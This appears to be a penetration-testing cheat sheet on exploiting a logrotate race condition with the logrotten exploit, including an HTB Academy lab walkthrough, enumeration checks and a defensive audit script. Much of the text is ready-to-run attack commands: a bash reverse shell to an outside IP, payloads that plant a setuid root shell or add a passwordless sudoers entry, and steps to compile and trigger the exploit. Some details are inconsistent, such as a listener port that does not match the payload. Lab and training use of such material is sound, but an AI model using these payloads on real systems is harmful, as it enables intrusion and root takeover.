📜 Logrotate Exploitation

🎯 Overview

A race condition in specific logrotate versions (CVE-2011-1548, CVE-2011-1154) allows privilege escalation: while logrotate runs as root, a user who can manipulate the log file it is rotating can hijack the rotation and have root write attacker-controlled content where it should not.

πŸ” Prerequisites

Required Conditions

# 1. Write permissions on log files
ls -la /var/log/ | grep $(whoami)

# 2. Vulnerable logrotate version
logrotate --version
# Vulnerable: 3.8.6, 3.11.0, 3.15.0, 3.18.0

# 3. Logrotate runs as root (via cron)
ps aux | grep logrotate
cat /etc/cron.daily/logrotate

Configuration Analysis

# Check logrotate configuration
cat /etc/logrotate.conf

# Important settings
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

# Check specific log configurations  
ls /etc/logrotate.d/
cat /etc/logrotate.d/*

🚀 Exploitation with Logrotten

Download and Compile Exploit

# Get logrotten exploit
git clone https://github.com/whotwagner/logrotten.git
cd logrotten

# Compile exploit
gcc logrotten.c -o logrotten

Create Payload

# Simple reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.14.55/1222 0>&1' > payload

# Alternative payloads
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > payload
echo 'echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > payload

Execute Exploit

# Setup listener on attacker machine (the port must match the one in the payload)
nc -nlvp 9001

# Run logrotten exploit
./logrotten -p ./payload /tmp/tmp.log

# For create mode (most common)
./logrotten -p ./payload /var/log/dpkg.log

# Wait for logrotate execution (usually daily)

HTB Academy Lab Example

# 1. Transfer exploit to target
git clone https://github.com/whotwagner/logrotten.git
scp -r logrotten/ htb-student@target:~/

# 2. Compile on target
ssh htb-student@target
cd logrotten/
gcc -o logrotten logrotten.c

# 3. Create payload for flag extraction
echo "cat /root/flag.txt > /home/htb-student/flag.txt" > payload

# 4. Trigger exploit
echo test >> /home/htb-student/backups/access.log
./logrotten /home/htb-student/backups/access.log -p payload

# 5. Read extracted flag
cat /home/htb-student/flag.txt

🔧 Configuration Mode Detection

Determine Logrotate Mode

# Check main config for mode
grep "create\|compress" /etc/logrotate.conf

# Common modes:
# create    - Creates new log file with specified permissions
# compress  - Compresses old log files

Mode-Specific Exploitation

# For create mode
./logrotten -p ./payload /target/log/file

# For compress mode  
./logrotten -c -p ./payload /target/log/file

πŸ• Timing and Execution

Cron Schedule Analysis

# Check when logrotate runs
cat /etc/cron.daily/logrotate
grep -r logrotate /etc/cron.d/

# Check last rotation status (path varies by distribution: /var/lib/logrotate/status
# on Debian/Ubuntu, /var/lib/logrotate/logrotate.status on RHEL/CentOS)
cat /var/lib/logrotate.status

Manual Triggering (if possible)

# Force logrotate execution (requires privileges)
sudo logrotate -f /etc/logrotate.conf

# Debug mode (safe testing)
logrotate -d /etc/logrotate.conf

πŸ” Detection & Enumeration

Logrotate Vulnerability Check

#!/bin/bash
echo "=== LOGROTATE VULNERABILITY CHECK ==="

echo "[+] Logrotate version:"
logrotate --version

echo "[+] Vulnerable version check:"
version=$(logrotate --version 2>/dev/null | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
if echo "$version" | grep -qE "(3\.8\.6|3\.11\.0|3\.15\.0|3\.18\.0)"; then
    echo "  [!] VULNERABLE VERSION: $version"
fi

echo "[+] Writable log files:"
find /var/log -writable 2>/dev/null | head -10

echo "[+] Logrotate configuration:"
grep "create\|compress" /etc/logrotate.conf 2>/dev/null | grep -v "#"

echo "[+] Logrotate cron job:"
ls -la /etc/cron.daily/logrotate 2>/dev/null

Log File Analysis

# Find writable log files
find /var/log -type f -writable 2>/dev/null

# Check log file permissions
ls -la /var/log/ | grep $(whoami)

# Log rotation status (on Debian/Ubuntu the file is /var/lib/logrotate/status,
# on RHEL/CentOS /var/lib/logrotate/logrotate.status)
cat /var/lib/logrotate.status | head -10
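An added audit script, not from the original notes or the logrotten project, that goes one step beyond the writable-file checks above: it pulls the rotated paths out of logrotate configs and walks each one up to a boundary directory, reporting any file or parent directory that a non-root user could rename or replace, since that is what the race depends on. AUDIT_TRUSTED_OWNERS, logrotate_paths, check_path and audit_logrotate are assumed names; on a real host run `audit_logrotate / /etc/logrotate.conf /etc/logrotate.d/*`.

```shell
#!/bin/sh
# Added audit helper, not part of logrotten or the original notes: lists the
# log paths a logrotate config rotates and reports any whose file or parent
# directories a non-root user could rename or replace (the precondition the
# logrotten race relies on). AUDIT_TRUSTED_OWNERS is an assumed variable name.

# Print every absolute path token that precedes a "{" block in the configs.
logrotate_paths() {
    awk '/^[[:space:]]*(#|include)/ { next }
         /[{]/ { sub(/[{].*/, ""); n = split(buf " " $0, t, /[ \t]+/)
                 for (i = 1; i <= n; i++) if (t[i] ~ /^\//) print t[i]
                 buf = ""; next }
         /[}]/ { buf = ""; next }
               { buf = buf " " $0 }' "$@"
}

# Print one finding for PATH or a parent directory up to STOP and return 0;
# return 1 when nothing in the chain is untrusted-owned or writable.
check_path() {
    local cur="$1" stop="$2" trusted owner mode m
    trusted=" ${AUDIT_TRUSTED_OWNERS:-root} "
    [ -e "$cur" ] || { echo "MISSING $cur"; return 0; }
    while :; do
        owner=$(stat -c %U "$cur") && mode=$(stat -c %a "$cur") || return 2
        m=$((0$mode))        # parse the octal mode string
        case "$trusted" in
            *" $owner "*) ;;
            *) echo "OWNER $owner $cur"; return 0 ;;
        esac
        # group/other write bit (octal 022) allows replacing the entry, except
        # in a sticky directory (octal 01000) where others cannot rename it
        if [ $((m & 18)) -ne 0 ] && { [ ! -d "$cur" ] || [ $((m & 512)) -eq 0 ]; }; then
            echo "WRITABLE $mode $cur"; return 0
        fi
        if [ "$cur" = "$stop" ] || [ "$cur" = / ]; then return 1; fi
        cur=$(dirname "$cur")
    done
}

# Audit every path (globs expanded by the for loop) from the CONFIG files,
# walking up to STOP. Prints findings; returns 1 if any, 0 if clean.
audit_logrotate() {
    local stop="$1" p out rc=0
    shift
    for p in $(logrotate_paths "$@"); do
        if out=$(check_path "$p" "$stop"); then echo "$out"; rc=1; fi
    done
    return $rc
}
```

A log directory flagged as OWNER or WRITABLE is the configuration to fix (root-owned, mode 0755 directories with the log file itself not group/world writable), independently of the logrotate version installed.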

🔑 Quick Reference

Immediate Checks

# Version vulnerability
logrotate --version | grep -E "(3\.8\.6|3\.11\.0|3\.15\.0|3\.18\.0)"

# Writable logs
find /var/log -writable 2>/dev/null

# Configuration mode
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

Emergency Exploitation

# If vulnerable version + writable logs found
git clone https://github.com/whotwagner/logrotten.git
cd logrotten && gcc logrotten.c -o logrotten
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' > payload
./logrotten -p ./payload /writable/log/file

⚠️ Exploit Limitations

Requirements Summary

  • Vulnerable logrotate version (specific versions only)

  • Write permissions on target log files

  • Logrotate execution as privileged user

  • Timing dependency on cron schedule

Success Factors

  • Daily cron execution - Most common schedule

  • Large log files - More likely to trigger rotation

  • Active logging - Files that actually get rotated

  • Correct configuration mode - create vs compress


Logrotate exploitation leverages race conditions in log management - when logrotate runs as root with writable log files, the logrotten exploit can hijack the rotation process for privilege escalation.
